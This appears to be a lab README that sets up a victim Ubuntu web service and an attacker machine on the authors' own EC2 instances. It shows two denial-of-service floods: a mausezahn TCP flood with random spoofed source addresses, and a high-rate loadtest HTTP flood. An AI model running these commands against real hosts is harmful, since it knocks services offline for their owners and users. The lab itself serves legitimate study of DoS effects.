## Setup ##
### For victim machine ###
*  Install webmin.
```text
sudo apt-get install -y webmin
```
* Install python web package.
```
sudo apt-get install python-webpy
```
### For attacker machine ###
* Install npm and loadtest npm module.
```text
curl -sL https://deb.nodesource.com/setup_6.x | sudo -E bash -
sudo apt-get install -y nodejs
sudo npm install -g loadtest
```
* Install mausezhan.
```text
sudo apt-get install -y mz
```


## Execution Steps ##
### In victim machine ###
* Start the web service at port 8080 by doing the below.
```text
cd webservice
python service.py
```
### In attacker machine ###
* To start the 1st DoS attack, do the below(Be sure to replace victim with the ip address of the machine in which the webservice is run).
```
sudo mz eth0 -t tcp "dp=8080" -P "HTTP..." -B victim -A rand -c 1000000
```
* To start the 2nd DoS attack(Be sure to replace victim with the ip address of the machine in which the webservice is run).
```
sudo  loadtest -c 100 -n 1000000 --rps 1000 http://victim:8080/users/1
```

### Monitor performance of the victim machine ###
* Navigate to the webmin dashboard on port 10000(eg: https://35.167.180.174:10000).
* Use the system's respective root account credentials to login.
* Notice that the victim's machine performance will go down.

### Test Specs ###
* We tested in the below system.
```
victim
    Ubuntu 16.04.2 LTS
    1GB RAM
    8GB disk space

attacker
    Ubuntu 16.04.2 LTS
    1GB RAM
    8GB disk space
```
* Note: The attacker and the victim machines could be on the same machine or on different machines.
* We configured two AWS EC2 instances -- one as victim and another as attacker and executed the attack. 